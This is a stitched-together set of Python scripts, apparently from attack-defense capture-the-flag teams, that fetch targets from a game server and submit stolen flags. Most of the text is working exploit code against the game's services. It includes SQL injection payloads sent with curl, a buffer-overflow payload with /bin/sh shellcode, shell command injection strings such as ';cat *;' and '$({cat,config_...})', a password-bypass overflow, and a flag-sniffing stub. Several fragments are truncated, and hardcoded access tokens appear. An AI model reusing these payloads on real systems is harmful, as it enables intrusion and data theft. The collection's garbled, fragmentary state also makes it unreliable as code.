def run(args): from re import search from subprocess import Popen, PIPE, STDOUT import swpag_client # Retrieve the list of flag targets for this tick for service 5 (configuration) t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562") flask_flags = t.get_targets(2) for target in flask_flags: team = target['hostname'] flag_id = target['flag_id'] # Make sure we're not trying to hack ourselves or the test accounts if team in ["team9", "team11", "team12"]: print("Skipping {0}".format(team)) continue print("Trying {0} with flag_id {1}...".format(team, flag_id)) # Use curl to create a kid with a maliciously crafted last name that will exploit # a SQL injection vulnerability. Specifically, it will find the invitation for the # party ID that corresponds to the flag. kid_query = "Last'%20UNION%20SELECT%20invitation%20AS%20data%20FROM%20parties%20WHERE%20id%3D{0};--".format(flag_id) p = Popen(["curl", "-s", "{0}:10002/kid?age=8&first=First&last={1}".format(team, kid_query)], stdout=PIPE) # Read the response and get the ID of the kid we just created out = p.stdout.readline().decode() m = search("Created kid (\d+)", out) if m == None: continue # Now use the /find endpoint to ask the service which parties our kid is # attending. This triggers the SQL exploit. find_query = "{0}:10002/find?kid={1}".format(team, m.group(1)) p = Popen(["curl", "-s", find_query], stdout=PIPE) # Read output and find the party invitation out = p.stdout.readline().decode() m = search("Found kid at these parties: (\w+)", out) if m == None: continue # Use the party invitation to query for the party data from the /info endpoint info_query = "{0}:10002/info?id={1}&invitation={2}".format(team, flag_id, m.group(1)) p = Popen(["curl", "-s", info_query], stdout=PIPE) # Read the output and get the flag from the party's description field out = p.stdout.readline().decode() m = search("Party \[(\w+)\]", out) if m == None: continue # Send the flag to the scoring service result = t.submit_flag([m.group(1)]) print("Submitting flag {0} for team {1}: {2}".format(m.group(1), team, result))
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) #print(team.get_targets(SERVICE_ID)) EXCLUDE_HOSTNAMES = [EXCLUDE_TEAM_NAME, "localhost"] for target in team.get_targets(SERVICE_ID): try: # Ignore our own team if target["hostname"] in EXCLUDE_HOSTNAMES: continue flag_id = target["flag_id"] hostname = target["hostname"] port = target["port"] print("Running exploit on {0}:{1} -> {2}".format( hostname, port, flag_id)) flag_obtained = None process = pwn.remote(hostname, 10004) process.readuntil('id ') x = process.readuntil(')') x = x[0:10] pwn.enhex(x) try: x = int(x) - 36 - 88 z = hex(x) except Exception as e: process.close() continue y = pwn.p32(x) process.readuntil('?') process.write('R\n') process.readuntil('password\n') process.write('\n') process.write('12345') process.send('\n') process.write((b'\x90' * 20) + ( b'\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x16\x58\xd1\xe8\xcd\x80' ) + (b'\x90' * 30) + y + (b'\x44' * 20)) process.send('\n') process.send('\n') print(process.readuntil('password!')) process.send('\n') process.send('\n') print('cat ' + target['flag_id']) print(process.send("cat " + target["flag_id"] + "\n")) aaaa = process.recvall(timeout=2).strip("\r\n") print(team.submit_flag([aaaa])) process.close() except Exception as e: process.close() continue except Exception as e: print(e)
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) vm_info = team.get_vm() for key, value, in vm_info.items(): print("{0}: {1}".format(key, value)) except Exception as e: print(e)
def run(args): team_uri = 'http://' + args.team_ip + '/' flag_token = args.flag_token print('Team IP: ' + team_uri) print('Team Flag: ' + flag_token) try: t = swpag_client.Team(team_uri, flag_token) print(t.get_vm()) except: print("Unable to get VM info!")
def main(): try: with open("./flag-submitter.txt", "r") as flags_file: all_flags = flags_file.read().splitlines() team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) print(all_flags) success = team.submit_flag(all_flags) print(success) except Exception as e: print(e)
def run(args): import swpag_client serviceid = args.serviceid t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562") flags = t.get_targets(int(serviceid)) for target in flags: team = target['hostname'] flag_id = target['flag_id'] print("Team: {0}, FLAG: {1}".format(team, flag_id))
def run(args): team_uri = 'http://' + args.team_ip + '/' flag_token = args.flag_token flag = args.flag print('Team IP: ' + team_uri) print('Team Flag: ' + flag_token) print('Attempted Flag: ' + flag) try: t = swpag_client.Team(team_uri, flag_token) print(t.submit_flag([flag])) except: print("Unable to submit flag!")
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) TARGET_IDS = team.get_service_list() for target_id in TARGET_IDS: target_info = team.get_targets(target_id['service_id']) #target_info = team.get_targets(1) for target in target_info: print(f"Team name:{target['team_name']}") print(f"Host name:{target['hostname']}") print(f"Port:{target['port']}") print(f"Flag Id:{target['flag_id']}") except Exception as e: print(e)
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) for target_id in TARGET_IDS: target_info = team.get_targets(target_id) for target in target_info: print(target['team_name']) print(target['hostname']) print(target['port']) print(target['flag_id']) except Exception as e: print(e)
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) for target in team.get_targets(SERVICE_ID): # Ignore our own team if (target["team_name"] == EXCLUDE_TEAM_NAME): continue flag_id = target["flag_id"] hostname = target["hostname"] port = target["port"] print("Running exploit on {0}:{1} -> {2}".format( hostname, port, flag_id)) flag_obtained = None # Put exploit here and (hopefully) update the "flag_obtained" variable above! # Don't forget logic for if the service is patched or offline! # Otherwise a hang could be fatal. This can be as simple as wrapping your exploit logic in a try/except block. '''This is the example from the live event, using pwn tools. r = pwn.remote(target['hostname'], 10001) r.recvuntil("username:"******"sh\n") r.recvuntil("password:"******"pwned\n") r.recvuntil("work:") r.send("pwned\n") r.recvuntil("result") r.send("S\n") r.recvuntil("end\n") r.send("V0=V-8+0\n") r.send("V1=V0+10641\n") r.send("V2=V0+130\n") r.send("V-1073741792=V2+0\n") r.send("V-1073741791=V1+0\n") r.send("\n") r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*") flag_obtained = r.read(4096).split("\n")[0] print(flag_obtained) ''' if (flag_obtained is not None): print(team.submit_flag([flag_obtained])) except Exception as e: print(e)
#!/usr/bin/env python3 import swpag_client import optparse def get_argument(): parser = optparse.OptionParser() parser.add_option("-i", "--team-interface", dest="team_interface", help = 'Team interface on CTF game') parser.add_option("-t", "--flag-token", dest="flag_token", help = 'Flag token') parser.add_option("-f", "--stolen-flags", dest="stolen_flags", help = 'File of stolen flags, a flag in each line') (options, arguments) = parser.parse_args() if not options.team_interface: parser.error("[-] Please specify Team interface, use --help for more info.") elif not options.flag_token: parser.error("[-] Please specify Flag Token, use --help for more info.") elif not options.stolen_flags: parser.error("[-] Please specify a file contains list of flags to submit, use --help for more info.") return options if __name__ == "__main__": options = get_argument() ctf_game = swpag_client.Team("http://"+options.team_interface, options.flag_token) flags_file = open(options.stolen_flags, 'r') flag_lines = flags_file.readlines() for flag in flag_lines: print(ctf_game.submit_flag(["{}".format(flag.strip())]))
# # Description: This script will sniff the local network looking for trafic # going to the scoring machine and will attempt to extract the flags # from the payload of the message. #==================================================== import swpag_client import sys import getopt import string import scapy.all as scapy url = 'http://54.241.76.20' token = '66978175b387ba7b6dee386d16b40b29' team_object = swpag_client.Team(url, token) interface = "" scoreboard_ip = "" our_machine_ip = "" def scoreboard_sniffer(packet): print('Found a packet') flag = "" # Extract flag from packet # Dependent on the format of the flags and messages. team_object.submit_flag(flag)
#!/usr/bin/env python3 import swpag_client from pwn import * t = swpag_client.Team('http://34.211.129.130', 'AxuE8hQPxgquUdetEO3P') teams = t.get_targets(1) for team in teams: if (team['hostname'] == 'team13' or team['hostname'] == 'team14' or team['hostname'] == 'team15' or team['hostname'] == 'team20' or team['hostname'] == 'team22'): try: r = remote(team['hostname'], 10001) r.recvuntil('(3) Exit.') r.send('2\n') r.recvuntil('Select a name for your backup:') r.send('a\n') r.recvuntil('Choose a secure password for your backup:') exploit = ("a; /bin/sh; a\n") # print(exploit) r.send(exploit) # r.recvuntil('Here is your backup data that was stored securely:') print("First line: " + str(r.recv())) print("Second line: " + str(r.recv())) ls_file = str("ls | grep " + team['flag_id'] + '\n') r.send(ls_file) get_file = r.recv() get_file = get_file.decode() print("File: " + str(get_file)) open_file = ('cat ' + str(get_file) + '\n') r.send(open_file)
ctf_threads.append(x) except: module_logger.error('Error Taking Dump') time.sleep(current_tick['approximate_seconds_left'] + 1) for service in services: x = ctf_threads.pop() x.kill_process() if __name__ == '__main__': parsed_arguments = arguement_parser.parse_args() if parsed_arguments.game_interface_url is None or parsed_arguments.auth_token is None: module_logger.error(arguement_parser.usage) exit() try: TeamClient = swpag_client.Team(parsed_arguments.game_interface_url, parsed_arguments.auth_token) # print(json.dumps(,indent=4)) curr_tick_info = TeamClient.get_game_status()['tick'] end_date = datetime.strptime(curr_tick_info['ends_on'], '%Y-%m-%d %h:%m%s') if end_date > datetime.datetime.now(): module_logger.info("Game Has Ended On %s", curr_tick_info['ends_on']) TeamClient.get_game_status() run_service(TeamClient, parsed_arguments.interface, parsed_arguments.output_dir) except: module_logger.error("Game Client Not Connecting") exit()
def run(args): from re import search from subprocess import Popen, PIPE, STDOUT import swpag_client from threading import Timer # Retrieve the list of flag targets for this tick for service 5 (configuration) t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562") backup_flags = t.get_targets(1) for target in backup_flags: team = target['hostname'] flag_id = target['flag_id'] # Make sure we're not trying to hack ourselves or the test accounts if team in ["team9", "team11", "team12"]: print("Skipping {0}".format(team)) continue try: print("Trying {0}...".format(team)) # Spin up an nc process for the service and a timer. The timer is a # fallback mechanism to ensure the process doesn't hang if we get # into an unexpected situation. p = Popen(["nc", team, "10001"], stdout=PIPE, stdin=PIPE) tt = Timer(3, p.kill) tt.start() # Send our maliciously crafted input to trick the backup service into # running ls on its storage directory, piped into grep to find the flag # file that we're looking for. The second half of the file name is the password. out = str( p.communicate(input="2\na;ls | grep {0};\n\n\n".format( flag_id).encode())) m = search("\w{20}_(\w{20})", out) if m == None: continue # Now use a new nc process to connect and read the file with the password # we found in the previous step. The contents will be the flag. p = Popen(["nc", team, "10001"], stdout=PIPE, stdin=PIPE) out = str( p.communicate(input="2\n{0}\n{1}\n\n\n".format( flag_id, m.group(1)).encode())) m = search("(FLG\w+)Hello", out) if m == None: continue # Send the flag to the scoring service, then cancel the timer since # we no longer need it. result = t.submit_flag([m.group(1)]) tt.cancel() print("Submitting flag {0} for team {1}: {2}".format( m.group(1), team, result)) except: print("Error")
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) os.system("rm -rf temp && mkdir temp") for target in team.get_targets(SERVICE_ID): # Ignore our own team if (target["team_name"] == EXCLUDE_TEAM_NAME): continue flag_id = target["flag_id"] hostname = target["hostname"] port = target["port"] print("Running exploit on {0}:{1} -> {2}".format( hostname, port, flag_id)) flag_obtained = None # Put exploit here and (hopefully) update the "flag_obtained" variable above! # Don't forget logic for if the service is patched or offline! Otherwise a hang could be fatal, this can be as simple as wrapping your exploit logic in a try/except block '''This is the example from the live event, using pwn tools. r = pwn.remote(target['hostname'], 10001) r.recvuntil("username:"******"sh\n") r.recvuntil("password:"******"pwned\n") r.recvuntil("work:") r.send("pwned\n") r.recvuntil("result") r.send("S\n") r.recvuntil("end\n") r.send("V0=V-8+0\n") r.send("V1=V0+10641\n") r.send("V2=V0+130\n") r.send("V-1073741792=V2+0\n") r.send("V-1073741791=V1+0\n") r.send("\n") r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*") flag_obtained = r.read(4096).split("\n")[0] print(flag_obtained) ''' os.system( "curl -m 2 \"{0}:10003/kid?first=%25&last=%25'%20UNION%20SELECT%20description%20AS%20data%20from%20parties;--&age=1\" > temp/results{1}.txt" .format(hostname, hostname)) x = None with open("temp/results{0}.txt".format(hostname), "r+") as f: x = f.readline() x = x[12:] os.system( "curl -m 2 \"{0}:10003/find?kid={1}\" > temp/results_flags{2}.txt" .format(hostname, x.strip("\r\n"), hostname)) y = None with open("temp/results_flags{0}.txt".format(hostname), "r+") as f: y = f.readline() y = y[28:] y = y.split(",") for flg in y: try: x = int(flg) except ValueError as e: if ("FLG" in flg): print(team.submit_flag([flg])) if (flag_obtained is not None): print(team.submit_flag([flag_obtained])) except Exception as e: print(e)
# print(t.submit_flag([data[-17:-1].decode('utf-8')])) c.close() return data[-17:-1].decode('utf-8') svcmap = { 10001: [backup1], 10002: [], 10003: [], 10004: [], 10005: [config1] } team = swpag_client.Team(team_url, team_password) def main_worker(d, targ, svc): # team_name, hostname, port, flag_id team_name = targ["team_name"] hostname = targ["hostname"] port = targ["port"] flag_id = targ["flag_id"] print("Beginning Attack on " + str(team_name) + ", " + str(hostname) + ", " + str(flag_id)) if attack_teams and team_name not in attack_teams: print("Team " + str(team_name) + " not in attack list. Returning.") return # skip this team for i, enabled in enumerate(enabled_attacks[svcid]):
def run(args): from re import search from subprocess import Popen, PIPE, STDOUT from threading import Timer import swpag_client # Retrieve the list of flag targets for this tick for service 5 (configuration) t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562") config_flags = t.get_targets(5) for target in config_flags: try: team = target['hostname'] flag_id = target['flag_id'] # Make sure we're not trying to hack ourselves or the test accounts if team in ["team9", "team11", "team12"]: print("Skipping {0}".format(team)) continue print("Trying {0}...".format(team)) # Spin up an nc process for the service and a timer. The timer is a # fallback mechanism to ensure the process doesn't hang if we get # into an unexpected situation. p = Popen(["nc", team, "10005"], stdout=PIPE, stdin=PIPE) tt = Timer(1.5, p.kill) tt.start() # Read output until we get to the prompt for i in range(0, 15): out = p.stdout.readline().decode() if "or (q)uit" in out: break # Send the commands to define our malicious config variable, then ask # the service to save it to a file. p.stdin.write( "d\na\n$({{cat,config_{0}}})\ns\n".format(flag_id).encode()) p.stdin.flush() # Read output until we find the line telling us the name of our file for i in range(0, 15): out = p.stdout.readline().decode() m = search("config_(\w+)!", out) if m != None: break if m == None: continue # Load the file, then view our variables. This executes the 'cat' # command we put in our crafted variable p.stdin.write("l\nconfig_{0}\nv\n".format(m.group(1)).encode()) p.stdin.flush() # Read output until we find the flag for i in range(0, 30): out = p.stdout.readline().decode() m = search("CONFIG_flag=(\w+)", out) if m != None: break if m == None: continue # Send the flag to the scoring service, then cancel the timer since # we no longer need it. result = t.submit_flag([m.group(1)]) tt.cancel() print("Submitting flag {0} for team {1}: {2}".format( m.group(1), team, result)) except: print("Error")
def main(): try: team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN) for target in team.get_targets(SERVICE_ID): # Ignore our own team if (target["team_name"] == EXCLUDE_TEAM_NAME): continue flag_id = target["flag_id"] hostname = target["hostname"] port = target["port"] print("Running exploit on {0}:{1} -> {2}".format( hostname, port, flag_id)) flag_obtained = None # Put exploit here and (hopefully) update the "flag_obtained" variable above! # Don't forget logic for if the service is patched or offline! Otherwise a hang could be fatal, this can be as simple as wrapping your exploit logic in a try/except block '''This is the example from the live event, using pwn tools. r = pwn.remote(target['hostname'], 10001) r.recvuntil("username:"******"sh\n") r.recvuntil("password:"******"pwned\n") r.recvuntil("work:") r.send("pwned\n") r.recvuntil("result") r.send("S\n") r.recvuntil("end\n") r.send("V0=V-8+0\n") r.send("V1=V0+10641\n") r.send("V2=V0+130\n") r.send("V-1073741792=V2+0\n") r.send("V-1073741791=V1+0\n") r.send("\n") r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*") flag_obtained = r.read(4096).split("\n")[0] print(flag_obtained) ''' r = pwn.remote(target["hostname"], 10001) print(r.recvuntil("Exit.\n> ")) r.send("2\n") print(r.recvuntil("backup: ")) r.send("name\n") print(r.recvuntil("backup: ")) r.send(";cat *;\n") a = r.recvall(timeout=2) r.close() a = a.split("FLG") if len(a) < 1: continue z = [] for potential_flag in a: if a.index(potential_flag) == len(a) - 1: continue z.append("FLG" + potential_flag) if len(z) >= 50: print(team.submit_flag(z)) z = [] continue a = a.split("\n") for line in a: if not line.endswith(".secure.bak"): continue b = line[:-11] if len(b.split("_")) < 2: continue b = b.split("_")[1] if not b.startswith("FLG"): continue print(team.submit_flag([b])) if (flag_obtained is not None): print(team.submit_flag([flag_obtained])) except Exception as e: print(e)
#!/usr/bin/python import sys import swpag_client print("Welcome!") t = swpag_client.Team('http://52.52.83.248', 'pc9Zhk3DDDV9Y5ILrUs2') flag = input("Input flag: ") print(t.submit_flag(['%s']), flag) # print("Submit flag: %s", str(sys.argv[1]))
def run(args): from re import search from subprocess import Popen, PIPE, STDOUT import swpag_client from threading import Timer # Retrieve the list of flag targets for this tick for service 5 (configuration) t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562") tweety_flags = t.get_targets(4) for target in tweety_flags: team = target['hostname'] flag_id = target['flag_id'] # Make sure we're not trying to hack ourselves or the test accounts if team in ["team9", "team11", "team12"]: print("Skipping {0}".format(team)) continue try: print("Trying {0}...".format(team)) # Spin up an nc process for the service and a timer. The timer is a # fallback mechanism to ensure the process doesn't hang if we get # into an unexpected situation. p = Popen(["nc", team, "10004"], stdout=PIPE, stdin=PIPE) tt = Timer(3, p.kill) tt.start() # Try to read input until we get to the prompt, then choose to read # a tweet ('R' command) p.stdout.readline().decode() p.stdout.readline().decode() p.stdout.readline().decode() p.stdin.write("R\n".encode()) p.stdin.flush() # Read the next line of input to get to the second prompt, then send # a malicously crafted string that will trigger a buffer overflow and # effectively bypass the password check. p.stdout.readline().decode() p.stdin.write( "{0} AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .format(flag_id).encode()) p.stdin.flush() # Read the response and parse out the flag value out = p.stdout.readline().decode() m = out.replace("Note content: ", '') m.strip() m.replace('\n', ' ').replace('\r', '') # Send the flag to the scoring service, then cancel the timer since # we no longer need it. result = t.submit_flag([m[0:16]]) tt.cancel() print("Submitting flag {0} for team {1}: {2}".format( m[0:16], team, result)) except: import sys e = sys.exc_info()[0] print("Exception: {0}".format(e))
def getSWPAGFlags(args): t = swpag_client.Team(args.teamIp, args.teamToken) # Get the exploits per server serviceExploits = readSWPAGFile(args.file) services = serviceExploits.keys() # Get the status and only run on a new tick status = t.get_game_status() if current_tick < status['tick_id']: current_tick = status['tick_id'] f = open(args.logFile, "a") now = time.time() timestamp = datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S') f.write('Connecting to ' + args.teamIp + ' during tick ' + current_tick + ' at timestamp ' + timestamp) f.close() # determine targets tick_services = t.get_service_list() for service in tick_services: service_name = service['service_name'] targets = t.get_targets(service['service_id']) for target in targets: if target['hostname'] != args.ignoreHost: target_host = target['hostname'] target_port = target['port'] target_id = target['flag_id'] payload = None if service_name in services: payload = serviceExploits[service_name] # connect to target machine and send exploit if payload is not None: f = open(args.logFile, "a") now = time.time() timestamp = datetime.fromtimestamp(now).strftime( '%Y-%m-%d %H:%M:%S') f.write('Targeting ' + target['team_name'] + ' service ' + service_name) f.close() tc = connect(target_host, target_port) time.sleep(0.5) tc.shutdown(socket.SHUT_WR) # Now read in flags subrpocess.call( "function slowcat() { while read; do sleep .05; echo \"$REPLY\"; done;}", shell=True, executable='/bin/bash') data = subprocess.check_output( f"cat {payload} | slowcat | nc {target_host} {target_port}", shell=True, executable='/bin/bash') output = data.decode("utf-8") flag = output.replace("\n", "") result = t.submit_flag([flag]) f = open(args.logFile, "a") now = time.time() timestamp = datetime.fromtimestamp(now).strftime( '%Y-%m-%d %H:%M:%S') f.write('Tried to submit token for ' + target['team_name'] + ' got result ' + result) f.close() if args.slackChannel and args.slackToken: sendSlackMessage( args.slackChannel, args.slackToken, 'Submitted token for ' + target['team_name'] + ' got result: ' + result)
c.sendline("l") c.recvline() c.sendline("config_"+filename) data = c.recvline() c.sendline("cat config_"+ flag_id ) data = c.recvline() data = c.recvline() print(t.submit_flag([data[-17:-1].decode('utf-8')])) c.close() return data url='http://34.195.187.175' token= '66978175b387ba7b6dee386d16b40b29' t = sc.Team(url, token); targets = t.get_targets(5) for target in targets: print(target['hostname']) print(target['flag_id']) if target['hostname'] == 'team10': print("team5") elif target['hostname'] == 'team6': print("team9") elif target['hostname'] == 'team7': print("team7") else : try: get_flag(target['hostname'],10005,target['flag_id'],'token',t) except:
c.sendline("l") c.recvline() c.sendline("config_"+filename) data = c.recvline() c.sendline("cat config_"+ flag_id ) data = c.recvline() data = c.recvline() c.close() return data[-17:-1].decode('utf-8') map = {10005: [vulnerability1]} team = swpag_client.Team(game_link, game_token) def launch_vul(id, targ, svc): team_name = targ["team_name"] hostname = targ["hostname"] port = targ["port"] flag_id = targ["flag_id"] if other_teams and team_name not in other_teams: return; # Don't do anything here for i, buf in enumerate(vulnerability[svcid]): if not enabled: continue buf1 = map[svcid][i] flag = buf1(hostname, port, flag_id)